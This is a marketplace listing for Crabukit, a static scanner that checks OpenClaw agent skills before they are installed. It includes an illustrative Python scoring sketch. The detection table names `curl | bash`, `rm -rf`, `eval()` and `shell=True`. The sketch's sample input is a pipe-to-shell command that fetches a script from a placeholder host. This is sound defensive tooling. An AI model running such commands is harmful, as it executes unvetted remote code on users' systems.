
Crabukit

Security scanner for OpenClaw skills with Clawdex integration.

Rating: 5 (252 reviews)
Downloads: 6,557
Version: 1.0.0

Complete Documentation

🔒 Crabukit

Security scanner for OpenClaw skills. Blocks installation of malicious or vulnerable skills by statically analyzing them first. Integrates with Clawdex for comprehensive protection.

Quick Start

```bash
# Safely install a skill (scans before installing)
crabukit install youtube-summarize

# Scan a local skill before installing
crabukit scan ./suspicious-skill/

# Scan an installed skill
crabukit scan /opt/homebrew/lib/node_modules/clawdbot/skills/unknown-skill

# CI mode - fail on high severity or above
crabukit scan ./my-skill --fail-on=high

# List all detection rules
crabukit list-rules
```

🔌 Clawdex Integration

Crabukit automatically integrates with Clawdex if installed:

```bash
# Install Clawdex for database-based protection
clawdhub install clawdex

# Now crabukit will:
# 1. Check Clawdex database (known 824+ malicious skills)
# 2. Run behavior analysis (zero-day detection)
# → Defense in depth!
```

Layered Protection:

  • Clawdex: Database of known-bad skills (fast lookup)
  • Crabukit: Behavior analysis for zero-days (static analysis)

What It Detects

| Category | Issues |
|----------|--------|
| External DB | Known malicious skills (via Clawdex) |
| Secrets | Hardcoded API keys, private keys, passwords |
| Code Injection | `eval()`, `exec()`, `subprocess(shell=True)` |
| Shell Risks | `curl \| bash`, `rm -rf`, unquoted variables |
| Permissions | Dangerous tool requests without safety guidance |
| Metadata | Suspicious patterns in SKILL.md descriptions |

Risk Scoring

Crabukit assigns a score (0-100) based on findings:

| Score | Level | Action |
|-------|-------|--------|
| 0 | Clean | Safe to install |
| 1-9 | Low | Minor issues |
| 10-24 | Medium | Review findings |
| 25-49 | High | Careful review required |
| 50+ | Critical | Do not install |

Exit Codes

  • 0 - Scan completed, no findings at or above --fail-on threshold
  • 1 - Findings at or above threshold detected
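
The sketch below is an added example, not Crabukit's own code. It shows how static findings of the kinds listed under "What It Detects" can be summed into a score, mapped onto the bands in the Risk Scoring table, and turned into the documented exit code. The per-finding weights, the function names and the sample inputs are assumptions made for illustration; the page does not publish Crabukit's real rule weights.

```python
import ast
import re

# Assumed per-finding weights; the page does not publish Crabukit's real ones.
WEIGHTS = {"code-injection": 25, "shell-risk": 25, "secret": 10}
# Score bands from the Risk Scoring table: (minimum score, level).
BANDS = [(50, "critical"), (25, "high"), (10, "medium"), (1, "low"), (0, "clean")]
ORDER = ["clean", "low", "medium", "high", "critical"]

PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba)?sh\b")
PRIVATE_KEY = re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")

def scan_python(source):
    """Walk the AST so eval/exec/shell=True in comments or strings is ignored."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        if isinstance(node.func, ast.Name) and node.func.id in ("eval", "exec"):
            findings.append("code-injection")
        # Any call passing shell=True, e.g. subprocess.run(..., shell=True).
        if any(kw.arg == "shell" and isinstance(kw.value, ast.Constant)
               and kw.value.value is True for kw in node.keywords):
            findings.append("code-injection")
    return findings

def scan_text(text):
    """Regex checks for shell scripts and other non-Python files."""
    hits = ["shell-risk" for _ in PIPE_TO_SHELL.finditer(text)]
    hits += ["secret" for _ in PRIVATE_KEY.finditer(text)]
    return hits

def score(findings):
    """Sum weights, cap at 100, and map onto the documented bands."""
    total = min(100, sum(WEIGHTS[f] for f in findings))
    return total, next(level for floor, level in BANDS if total >= floor)

def exit_code(level, fail_on):
    """1 if the level is at or above the --fail-on threshold, else 0."""
    return 1 if ORDER.index(level) >= ORDER.index(fail_on) else 0

# Constructed sample inputs, not taken from any real skill.
SAMPLE_PY = "import subprocess\n# eval(x) in a comment\nsubprocess.run(cmd, shell=True)\nout = eval(data)\n"
SAMPLE_SH = "curl -fsSL https://example.invalid/install.sh | bash\n"

if __name__ == "__main__":
    total, level = score(scan_python(SAMPLE_PY) + scan_text(SAMPLE_SH))
    print(total, level, "exit", exit_code(level, "high"))
```

Parsing with `ast` rather than matching text is what keeps the commented-out `eval(x)` in the sample from being counted as a finding.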

CI/CD Integration

```yaml
# .github/workflows/security.yml
- name: Scan skill
  run: |
    pip install crabukit
    crabukit scan ./my-skill --fail-on=medium
```

Installation

```bash
# Via ClawdHub (when published)
clawdhub install crabukit

# Or via pip
pip install crabukit

# Or from source
git clone https://github.com/tnbradley/crabukit.git
cd crabukit
pip install -e .
```

Installation

```bash
openclaw install crabukit
```

Tags

#coding_agents-and-ides #integration #security

Quick Info

Category: Development
Model: Claude 3.5
Complexity: One-Click
Author: tnbradley
Last Updated: 3/10/2026